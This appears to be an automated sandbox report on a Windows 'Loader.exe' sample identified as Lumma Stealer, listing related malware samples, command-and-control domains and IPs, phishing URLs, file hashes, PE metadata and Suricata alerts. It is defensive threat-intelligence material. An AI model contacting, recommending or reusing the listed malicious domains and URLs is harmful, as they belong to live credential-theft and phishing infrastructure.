	https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=	Get hash	malicious	HTMLPhisher	Browse
104.21.32.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php
23.55.153.106	SET_UP.exe	Get hash	malicious	LummaC Stealer	Browse
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	ro7MnkIxJk.exe	Get hash	malicious	LummaC	Browse
	hQ3bNN05F8.exe	Get hash	malicious	LummaC	Browse
	FtbY5uqGY0.exe	Get hash	malicious	LummaC	Browse
	x1e7BlMmbl.exe	Get hash	malicious	LummaC	Browse
	8E273IHyAW.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
immureprech.biz	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	adv.ps1	Get hash	malicious	LummaC	Browse	104.21.22.222
	d2W4YpqsKg.lnk	Get hash	malicious	LummaC	Browse	172.67.207.38
	QnNRjhoN.ps1	Get hash	malicious	LummaC	Browse	172.67.207.38
	infrarecorder.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	172.67.207.38
brendon-sharjen.biz	vPqd8HLs88.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
brendon-sharjen.biz	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.130.33
steamcommunity.com	SET_UP.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Setup.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ro7MnkIxJk.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	hQ3bNN05F8.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	FtbY5uqGY0.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	x1e7BlMmbl.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	8E273IHyAW.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	PHuHRcCpaJ.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
deafeninggeh.biz	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.16.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SET_UP.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.63
	https://sunnycloudtechnologies.com/suncn/msd.html	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	https://newsystem-upgrade-securitycheck.b-cdn.net/verify-human.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
	file.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	file.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly95NE81LnN0YXJ5bm91c2UucnUvdDV2My8=	Get hash	malicious	Unknown	Browse	172.67.213.90
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
AKAMAI-ASN1EU	SET_UP.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Setup.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	172.234.222.138
	elitebotnet.arm.elf	Get hash	malicious	Mirai, Okiru	Browse	23.38.73.255
	http://sourceforge.net/projects/nircmd/files/nircmd-x64.zip/download	Get hash	malicious	Unknown	Browse	104.116.245.49
	jade.mpsl.elf	Get hash	malicious	Mirai	Browse	95.100.100.172
	jade.ppc.elf	Get hash	malicious	Mirai	Browse	95.100.100.178
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	23.198.104.134
CLOUDFLARENETUS	SET_UP.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.63
	https://sunnycloudtechnologies.com/suncn/msd.html	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	https://newsystem-upgrade-securitycheck.b-cdn.net/verify-human.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
	file.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	file.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly95NE81LnN0YXJ5bm91c2UucnUvdDV2My8=	Get hash	malicious	Unknown	Browse	172.67.213.90
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.207.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SET_UP.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	Setup.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	Set-Up.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	MessengerAdmin.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	RedBull [YouTube Partneships].exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	BDxsBr8Dce.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	zA6ym8lbRp.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.32.1
	ClipMon.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.32.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_72801e51da857bf085e3ec8cf8b25a6c7ba11dc_7285b65d_5b0e4285-cbf1-4292-9c53-376a5078d0c8\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.932468349252479
Encrypted:	false
SSDEEP:	96:hFL5OHasUh1od7Rr6tQXIDcQqc6mcEKcw34es+HbHg/opAnQk3dDDWpsjOyWMmdv:jLWaK0kigMqjpy1zuiFJJZ24IO8Ch8
MD5:	5B18211FF58272D45AADB1A0002583E8
SHA1:	7F175FA8AA62D8CC8F5FF1B5F48677478E14F7EF
SHA-256:	CF7C1A0F6E6517EC287853CB22E371D5F63FC2F76C59790ECCA5BB86DAABA310
SHA-512:	33448F4B465F15B0A04027C3B0CA8BF09FB4F1D81D9724151F5F3CA1D7A7DDE558AC94090DCE94B54CF329424204C0538052F05D438E8DCAE1578BFAA598D0E4
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.8.5.9.3.6.7.8.3.5.3.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.8.5.9.3.7.8.3.0.4.2.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.0.e.4.2.8.5.-.c.b.f.1.-.4.2.9.2.-.9.c.5.3.-.3.7.6.a.5.0.7.8.d.0.c.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.7.b.a.1.d.6.-.1.f.7.e.-.4.0.2.6.-.8.2.3.6.-.d.3.c.4.8.c.1.f.0.d.6.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.d.4.-.0.0.0.1.-.0.0.1.4.-.0.2.5.7.-.8.5.b.7.8.7.4.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.b.2.5.e.c.3.d.0.9.4.3.e.1.7.e.d.9.9.7.b.3.5.3.8.6.5.f.3.c.e.b.2.4.a.4.9.8.1.9.3.!.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER120C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 13 17:52:16 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	48422
Entropy (8bit):	2.7166422131343917
Encrypted:	false
SSDEEP:	192:6Vh62XaSg77zOeBG15XgYF4R5zLxbcdLrd3i2GiGVNfNucV6zeqcHsOX:ggSg77qeBG15X+LsPoxocY4tX
MD5:	50CFF0A2C0F25B99C49DD3757CFD85DF
SHA1:	86EC05970746A08A32B3097A6D1F9E00F0024DCE
SHA-256:	31C18CA80FB8536191FFC1E8337720B1E76CD0D64038E7E26CFCBA234BBDC336
SHA-512:	A1B012BE41ED4A31B2D5F237B23DB6F438941EB3ED27B3EC5786E439ED87BE55F8B1169FB5269F23A0BD3C034A18532E9D37300733BC8C22868F091333F280BA
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......Pt\g............4...........D...H...................t....+..........`.......8...........T...........x=..............p...........\...............................................................................eJ..............GenuineIntel............T...........Ct\g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1336.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8408
Entropy (8bit):	3.694965436090411
Encrypted:	false
SSDEEP:	192:R6l7wVeJvb6f6Y9bSU96mgmfk4bQpDM89bAdsfjAm:R6lXJz6f6YRSU96mgmfkXAWfR
MD5:	017E97569F715FFB6A6457F1203A0417
SHA1:	EEC2F34557F37F462897DC6A130522E5DBE8C270
SHA-256:	428D480042D26E8EAFF1483C8A66BAA4CA0E92D3E99ED2A0359C68EC4A045208
SHA-512:	6FCD830207AB5072D14F6854AD51D29A27309E4C7B77F5FAFECF247C357BF2C036645E6784D34B23E42D93AE9C517D331A4BD65522E31AE805FD1E97BFB2533E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1366.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.46346567261658
Encrypted:	false
SSDEEP:	48:cvIwWl8zsWJg77aI9XEWpW8VYaBJYm8M4JMFO3Fy2+q8vMFOVcMpbad:uIjfsI79d7VfYJ4mK4Icmbad
MD5:	D300D635BF5B996C49FFBC00DE45D54F
SHA1:	440E17E05925683998EDF9D619C0CA9E1662CCE2
SHA-256:	5190CC7A5601538CC32FAB2B999368EFE0B4ABBA1F4278051DC2768D09D386DC
SHA-512:	FE69139ED9FD857CAE6BE7AF0A51DCFABCC5AC48A7F922D68CB2E84AA453CFD1F21AA88BA68B0514B067CAD35F6BEE06E06B2ABD4BCF4A8BDC719E0343CFF4F0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629814" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465380376607642
Encrypted:	false
SSDEEP:	6144:eIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNudwBCswSbZ:zXD94+WlLZMM6YFHA+Z
MD5:	5AD0B4CE838E3A7BF8DC6C78B9B627C9
SHA1:	0C72CFD720197F8B03B1DC4B7E727BFB6073AD2E
SHA-256:	EB5826E350E9569113080321FEA3A590669A4B28EC773275A4E766B2AB8CFAD0
SHA-512:	D12C71735E66EE205928C3B42E090B749602179511D79D301B3B42FC6F9DAFA861BCB8BC8C78278B50CFD3C73AE06C61EFE38968943B4C83B2C36B4DDF090CEC
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...M...............................................................................................................................................................................................................................................................................................................................................>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.000575547048131
TrID:	Win32 Executable (generic) a (10002005/4) 99.55% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Loader.exe
File size:	392'704 bytes
MD5:	55f7f34a571a52caefb86f49f0246390
SHA1:	b25ec3d0943e17ed997b353865f3ceb24a498193
SHA256:	81e2acbd26c2d3dcfba65fdff1c91d0927bfbb5f9d7c923184c97af4edda63f1
SHA512:	9da4bcc4de574361a37c1c7bd08f8fa12270dd62937243b49e859573ebb1e8f909afe35345075c549bb677edd179a8aac15f5cd0f9e75813da994fe0151b1f7f
SSDEEP:	6144:h+LPxYP6xpZN1zyP24L2SF36+s9cGtIGg8blO5W:gTxFZN1zyPxKSZ89VIGgelh
TLSH:	7E84F120BAE0C032D8575934D930D6B07E7F783217A6CA9F37A8477E2E706C25B66356
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...F...F...F.......F.......F.......F.......F...F...F.......F.......F.......F..Rich.F..........PE..L...t..d.................^.

File Icon


Icon Hash:	63396de971436e0f

Static PE Info

General

Entrypoint:	0x40447f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x64E0C874 [Sat Aug 19 13:49:40 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	c55ba1570e0a8d1efaf9700a357312b9

Entrypoint Preview

Instruction
call 00007F8F18EEC45Eh
jmp 00007F8F18EE7E2Eh
mov edi, edi
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
call 00007F8F18EEC4DEh
mov dword ptr [esi], 00401244h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 00401244h
jmp 00007F8F18EEC576h
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 00401244h
call 00007F8F18EEC563h
test byte ptr [ebp+08h], 00000001h
je 00007F8F18EE7FB9h
push esi
call 00007F8F18EE7829h
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov eax, dword ptr [edi+04h]
test eax, eax
je 00007F8F18EE7FF9h
lea edx, dword ptr [eax+08h]
cmp byte ptr [edx], 00000000h
je 00007F8F18EE7FF1h
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [esi+04h]
cmp eax, ecx
je 00007F8F18EE7FC6h
add ecx, 08h
push ecx
push edx
call 00007F8F18EEC5BFh
pop ecx
pop ecx
test eax, eax
je 00007F8F18EE7FB6h
xor eax, eax
jmp 00007F8F18EE7FD6h
test byte ptr [esi], 00000002h
je 00007F8F18EE7FB7h
test byte ptr [edi], 00000008h
je 00007F8F18EE7FA4h
mov eax, dword ptr [ebp+10h]
mov eax, dword ptr [eax]
test al, 01h
je 00007F8F18EE7FB7h
test byte ptr [edi], 00000001h
je 00007F8F18EE7F96h
test al, 02h
je 00007F8F18EE7FB7h
test byte ptr [edi], 00000002h
je 00007F8F18EE7F8Dh
xor eax, eax
inc eax
pop edi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax]
cmp eax, 00004F4Dh

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x56218	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x3b68	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2db8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1c0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x55c7e	0x55e00	e2ff3a4fb28c146775d97f63218ae5a2	False	0.6258358351528385	data	6.289189405612633	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x57000	0xaba8	0x6000	eab541c7174eadb7aad46e6a4821d981	False	0.08064778645833333	data	0.945377773203018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x62000	0x3b68	0x3c00	f8c097bfd1c2ec013c6386c296a04b38	False	0.443359375	data	3.9464645575078805	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x62210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.532258064516129
RT_ICON	0x62210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.532258064516129
RT_ICON	0x628d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.41120331950207467
RT_ICON	0x628d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.41120331950207467
RT_ICON	0x64e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.44769503546099293
RT_ICON	0x64e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.44769503546099293
RT_STRING	0x65570	0x144	data	Tamil	India	0.5370370370370371
RT_STRING	0x65570	0x144	data	Tamil	Sri Lanka	0.5370370370370371
RT_STRING	0x656b8	0x4aa	data	Tamil	India	0.44472361809045224
RT_STRING	0x656b8	0x4aa	data	Tamil	Sri Lanka	0.44472361809045224
RT_ACCELERATOR	0x65318	0x50	data	Tamil	India	0.825
RT_ACCELERATOR	0x65318	0x50	data	Tamil	Sri Lanka	0.825
RT_GROUP_ICON	0x652e8	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0x652e8	0x30	data	Tamil	Sri Lanka	0.9375
RT_VERSION	0x65368	0x204	data			0.5445736434108527

Imports

DLL	Import
KERNEL32.dll	EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, InterlockedCompareExchange, WriteConsoleInputA, SetComputerNameW, FreeEnvironmentStringsA, GetModuleHandleW, EnumCalendarInfoExW, EscapeCommFunction, GetCurrencyFormatA, EnumTimeFormatsA, TlsSetValue, GetVolumeInformationA, LoadLibraryW, GetCalendarInfoW, SetVolumeMountPointA, FindNextVolumeW, GetFileAttributesW, SetComputerNameExW, FindNextVolumeMountPointW, GetDevicePowerState, InterlockedIncrement, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, BackupWrite, CreateJobSet, CopyFileA, GetTempFileNameA, LoadLibraryA, SetCalendarInfoW, EnumDateFormatsA, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetShortPathNameW, GetVersionExA, GetDiskFreeSpaceExW, ReadConsoleInputW, SetFileAttributesW, LCMapStringA, GetComputerNameA, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, IsDebuggerPresent, HeapFree, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, SetFilePointer, CloseHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, RaiseException, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
ADVAPI32.dll	ReadEventLogW
ole32.dll	CoSuspendClassObjects
WINHTTP.dll	WinHttpCheckPlatform

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T18:52:05.352965+0100	2058039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)	1	192.168.2.4	55439	1.1.1.1	53	UDP
2024-12-13T18:52:07.012813+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.4	49730	104.21.32.1	443	TCP
2024-12-13T18:52:07.012813+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.32.1	443	TCP
2024-12-13T18:52:07.740970+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.32.1	443	TCP
2024-12-13T18:52:07.740970+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.32.1	443	TCP
2024-12-13T18:52:09.293460+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.22.222	443	TCP
2024-12-13T18:52:10.020240+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	104.21.22.222	443	TCP
2024-12-13T18:52:10.020240+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.22.222	443	TCP
